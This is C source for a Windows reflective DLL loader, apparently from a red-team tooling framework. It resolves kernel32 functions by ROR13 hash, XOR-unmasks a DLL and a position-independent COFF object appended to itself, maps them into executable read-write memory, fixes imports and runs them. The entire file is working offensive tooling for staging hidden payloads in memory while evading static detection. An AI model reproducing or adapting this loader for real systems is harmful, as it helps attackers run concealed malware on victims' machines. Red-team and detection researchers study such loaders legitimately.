/*
 * Copyright 2025 Raphael Mudge, Adversary Fan Fiction Writers Guild
 *
 * Redistribution and use in source and binary forms, with or without modification, are
 * permitted provided that the following conditions are met:
 *
 * 1. Redistributions of source code must retain the above copyright notice, this list of
 * conditions and the following disclaimer.
 *
 * 2. Redistributions in binary form must reproduce the above copyright notice, this list of
 * conditions and the following disclaimer in the documentation and/or other materials provided
 * with the distribution.
 *
 * 3. Neither the name of the copyright holder nor the names of its contributors may be used to
 * endorse or promote products derived from this software without specific prior written
 * permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS “AS IS” AND ANY EXPRESS
 * OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
 * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
 * COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
 * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
 * SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR
 * TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
 * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 */

/* function prototypes */
void ReflectiveLoader();

/* this is the REAL entry point to this whole mess and it needs to go first! */
__attribute__((noinline, no_reorder)) void go() {
	ReflectiveLoader();
}

/*
 * loader.h is a refactored Reflective Loader and some macros/definitions we need.
 * it has several functions intended to be used across loaders.
 */
#include "loaderdefs.h"
#include "loader.h"

/* a PIC dprintf implementation, might help us in our quest */
#include "debug.h"

/* header to run our pico! */
#include "picorun.h"

/*
 * implementations of findFunctionByHash and findModulebyHash by walking the
 * Export Address Table.
 */
#include "resolve_eat.h"

/* build a table of functions we need/want */
#define WIN32_FUNC( x ) __typeof__( x ) * x

typedef struct {
	WIN32_FUNC(LoadLibraryA);
	WIN32_FUNC(GetProcAddress);
	WIN32_FUNC(VirtualAlloc);
	WIN32_FUNC(VirtualFree);
} WIN32FUNCS;

/*
 * Need other hashes?
 *
 * https://github.com/ihack4falafel/ROR13HashGenerator
 */
#define KERNEL32DLL_HASH	0x6A4ABC5B
#define LOADLIBRARYA_HASH	0xEC0E4E8E
#define GETPROCADDRESS_HASH	0x7C0DFCAA
#define VIRTUALALLOC_HASH	0x91AFCA54
#define VIRTUALFREE_HASH	0x030633AC

void findNeededFunctions(WIN32FUNCS * funcs) {
	char * hModule = (char *)findModuleByHash(KERNEL32DLL_HASH);

	funcs->LoadLibraryA   = (__typeof__(LoadLibraryA) *)   findFunctionByHash(hModule, LOADLIBRARYA_HASH);
	funcs->GetProcAddress = (__typeof__(GetProcAddress) *) findFunctionByHash(hModule, GETPROCADDRESS_HASH);
 	funcs->VirtualAlloc   = (__typeof__(VirtualAlloc) *)   findFunctionByHash(hModule, VIRTUALALLOC_HASH);
 	funcs->VirtualFree    = (__typeof__(VirtualFree) *)    findFunctionByHash(hModule, VIRTUALFREE_HASH);
}

/*
 * This is the Crystal Palace convention for getting ahold of data linked with this loader.
 */
char __DLLDATA__[0] __attribute__((section("my_data")));
char __BOFDATA__[0] __attribute__((section("my_bof")));
char __KEYDATA__[0] __attribute__((section("my_key")));

#ifdef WIN_X86
__declspec(noinline) ULONG_PTR caller( VOID ) { return (ULONG_PTR)WIN_GET_CALLER(); }

char * findAppendedDLL() {
	return PTR_OFFSET(caller(), (ULONG_PTR)&__DLLDATA__ + 5);
}

char * findAppendedPICO() {
	return PTR_OFFSET(caller(), (ULONG_PTR)&__BOFDATA__ + 5);
}

char * findAppendedKey() {
	return PTR_OFFSET(caller(), (ULONG_PTR)&__KEYDATA__ + 5);
}
#else
char * findAppendedDLL() {
	return (char *)&__DLLDATA__;
}

char * findAppendedPICO() {
	return (char *)&__BOFDATA__;
}

char * findAppendedKey() {
	return (char *)&__KEYDATA__;
}
#endif

/*
 * This demonstrates the use of debug.h to do some printf-style debugging
 * Yeah, yeah... I wish for constexpr too... welcome to your C hellhole baby
 *
 * dprintf will call OutputDebugStringA. You'll need DbgView.exe from Sysinternals
 * to see the message.
 */
void debug_stat(WIN32FUNCS * funcs, char * verb, char * ptr, int length) {
	char msg[]   = { '%', 's', ' ', '%', 'p', ' ', '(', '%', 'd', ' ', 'b', 'y', 't', 'e', 's', ')', 0 };
	dprintf((IMPORTFUNCS *)funcs, msg, verb, ptr, length);
}

void debug_alloc(WIN32FUNCS * funcs, char * ptr, int length) {
	char alloc[] = { 'A', 'L', 'L', 'O', 'C', 0 };
	debug_stat(funcs, alloc, ptr, length);
}

void debug_free(WIN32FUNCS * funcs, char * ptr, int length) {
	char free[]  = { 'f', 'r', 'e', 'e', 0 };
	debug_stat(funcs, free, ptr, length);
}

/*
 * Our embedded resources are masked, so we need to unmask them.
 */
typedef struct {
	int   length;
	char  value[];
} _RESOURCE;

char * unmask(WIN32FUNCS * funcs, char * srcData) {
	_RESOURCE * key;
	_RESOURCE * src;
	char      * dst;

	/* parse our preplen + xor'd $KEY and our masked data too */
	key = (_RESOURCE *)findAppendedKey();
	src = (_RESOURCE *)srcData;

	/* allocate memory for our unmasked content */
	dst = funcs->VirtualAlloc( NULL, src->length, MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE );
	debug_alloc(funcs, dst, src->length);

	/* unmask it */
	for (int x = 0; x < src->length; x++) {
		dst[x] = src->value[x] ^ key->value[x % key->length];
	}

	return dst;
}

/*
 * Get the start address of our PIC DLL loader.
 */
char * getStart() {
#ifdef WIN_X86
	return PTR_OFFSET(caller(), (ULONG_PTR)go + 5);
#else
	return (char *)go;
#endif
}

/*
 * Our PICO loader, have fun, go nuts!
 */
typedef void (*PICOMAIN_FUNC_3)(char * loader, char * dllEntry, char * dllBase);

void RunViaFreeCOFF(WIN32FUNCS * funcs, char * dllEntry, char *dllBase) {
	char        * dstCode;
	char        * dstData;
	char        * src = findAppendedPICO();
	char        * entry;

	/* unmask our PICO! */
	src = unmask(funcs, src);

	/* allocate memory for our PICO */
	dstData = funcs->VirtualAlloc( NULL, PicoDataSize(src), MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_READWRITE );
	dstCode = funcs->VirtualAlloc( NULL, PicoCodeSize(src), MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN, PAGE_EXECUTE_READWRITE );

	/* load our pico into our destination address, thanks! */
	PicoLoad((IMPORTFUNCS *)funcs, src, dstCode, dstData);

	/* grab our entry point, the last thing we need from our unmasked PICO */
	entry = (char *)PicoEntryPoint(src, dstCode);

	/* now that our pico is loaded, let's free the buffer with the unmasked PICO content */
	debug_free(funcs, src, 0);
	funcs->VirtualFree( src, 0, MEM_RELEASE );

	/* execute our pico */
	((PICOMAIN_FUNC_3)entry) ((char *)getStart(), dllEntry, dllBase);
}

/*
 * Our reflective loader itself, have fun, go nuts!
 */
void ReflectiveLoader() {
	char       * dst;
	char       * src;
	char       * entry;
	DLLDATA      data;
	WIN32FUNCS   funcs;

	/* resolve the functions we'll need */
	findNeededFunctions(&funcs);

	/* find our DLL appended to this PIC */
	src = findAppendedDLL();

	/* unmask our DLL data */
	src = unmask(&funcs, src);

	/* parse our DLL! */
	ParseDLL(src, &data);

	/* allocate memory for it! */
	dst = funcs.VirtualAlloc( NULL, SizeOfDLL(&data), MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );

	/* load the damned thing */
	LoadDLL(&data, src, dst);

		/* we cast (WIN32FUNCS *) to (IMPORTFUNCS *) and get away with it because the first two
		 * members are the same. See loader.h for the IMPORTFUNCS definition. */

	/* process the imports */
	ProcessImports((IMPORTFUNCS *)&funcs, &data, dst);

	/* grab our entry point, it's the last thing we need */
	entry = (char *)EntryPoint(&data, dst);

	/* NOW, we can free the memory with our unmasked DLL content in it */
	debug_free(&funcs, src, 0);
	funcs.VirtualFree( src, 0, MEM_RELEASE );

	/* pass to our BOF */
	RunViaFreeCOFF(&funcs, entry, dst);
}
